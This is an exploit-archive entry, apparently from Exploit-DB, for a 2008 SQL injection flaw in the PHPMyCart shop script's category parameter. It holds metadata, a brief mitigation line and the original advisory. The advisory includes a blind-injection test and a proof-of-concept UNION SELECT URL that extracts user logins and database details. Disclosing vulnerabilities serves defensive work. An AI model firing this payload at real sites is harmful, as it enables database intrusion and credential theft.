PHPMyCart Injection Vulnerability

vendor:

PHPMyCart

by:

h0yt3r

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: PHPMyCart

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: N/A

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

PHPMyCart Injection Vulnerability

Script suffers from a not correctly verified category id variable which is used in SQL Querys. An Attacker can easily get sensitive information from the database by injecting unexpected SQL Querys. We dont get any SQL Errors when the Injection Query appear to be false. However we have to look for content changing when we inject. Look at AND 1=1/AND 1=0 All rows are echoed on the left side.

Mitigation:

Ensure that user input is properly validated and sanitized before being used in SQL queries.

Source

Exploit-DB raw data:

######################
#
#PHPMyCart Injection Vulnerability
#
######################
#
#Bug by: h0yt3r
#
##
###
##
#
#Script suffers from a not correctly verified category id variable which is used in SQL Querys.
#An Attacker can easily get sensitive information from the database by
#injecting unexpected SQL Querys.
#
#We dont get any SQL Errors when the Injection Query appear to be false.
#However we have to look for content changing when we inject.
#Look at AND 1=1/AND 1=0
#All rows are echoed on the left side.
#
#SQL Injection:
#http://[target]/[path]/shop.php?cat=[SQL]
#
#PoC:
#shop.php?cat=2%20and%201=0%20union%20select%201,concat(name,0x3a,login,0x3a,@@VERSION,0x3a,user(),0x3a,database())%20from%20user
#
#######################
#
#Greetz to b!zZ!t, ramon, thund3r, Free-Hack, Sys-Flaw and of course the neverdying h4ck-y0u Team!
#
#######################
####################### 

# milw0rm.com [2008-06-14]